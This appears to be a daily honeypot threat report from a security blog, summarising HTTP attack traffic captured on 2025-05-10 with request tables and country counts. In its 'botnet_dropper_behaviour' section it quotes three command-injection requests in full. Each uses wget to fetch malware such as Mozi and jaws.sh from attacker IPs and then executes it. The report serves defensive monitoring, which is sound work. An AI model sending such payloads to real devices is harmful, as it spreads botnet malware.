Skip to main content
  1. Daily-Posts/

Report: 2025-05-10

·420 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-10
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 26 new requests that have never been observed before (these were added to the monitored request database.).

A total of 957 requests were recorded during the day, originating from 3 different countries, with a peak of 171 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
MDIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
196.251.72.142GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/jaws.sh;chmod+777+*;./jaws.sh HTTP/1.1
103.48.64.43GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.43:42836/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.252.137.107target_addr=1.1.1.1%7cecho%20%24(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F103.252.137.107%2Fdwrioej%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips)&wanif=1_INTERNET_R_VID_100

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1521\x04\x01\x01\xBB\x17\xD7\x00\x88admin:password\x00
1541GET /bJdL HTTP/1.1
1551GET /dHz7 HTTP/1.1
1751GET /App/test HTTP/1.1
1761GET /Admin/test HTTP/1.1
1771GET /Media/test HTTP/1.1
1781GET /Vendor/test HTTP/1.1
1791GET /Server/test HTTP/1.1
1801GET /Staging/test HTTP/1.1
1811GET /Twilio/test HTTP/1.1
1821GET /Crm/test HTTP/1.1
1831GET /Config/test HTTP/1.1
1851\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x8F\x85\xC8\xA0ME\x0EA\x05\x02\x00\x01\x00\x00\xA1\xAA
1871GET /config/index?time=1746885677249190742 HTTP/1.1
1881GET /api/bin/440393?time=1746885939435011026 HTTP/1.1
1891POST /api/user/binLookup?time=1746885940212541345 HTTP/1.1
1991GET /index.php?phpinfo HTTP/1.1
2031GET /phpsysinfo/ HTTP/1.1
2041GET /phpsysinfo/test HTTP/1.1
2081GET /test.php?phpinfo HTTP/1.1
2101GET /system/phpinfo.php HTTP/1.1
2131GET /showphpinfo.php HTTP/1.1
2351GET /sI5l HTTP/1.1
2361GET /JyHQ HTTP/1.1
2371Get /admin/login.asp HTTP/1.1
2381POST /boaform/admin/formTracert HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0171US
1153NL
2106GB
370CN
462CH
549RU
643PL
740DE
830MD
926SC
1025UA
1123CA
1219LT
1319KR
1414FR
1511NP
1610GH
179HR
189IN
198JP
206IL
215HK
225VN
235ZA
244VE
254BE
264SG
273PT
283AU
293AO
302GE
312ID
322ZM
332AR
342BR
352AT
361EC
371SA
381IR
391TR
401KH
411CZ

Related

Report: 2025-05-09
·311 words
Repport Daily
Report: 2025-05-08
·432 words
Repport Daily
Report: 2025-05-07
·387 words
Repport Daily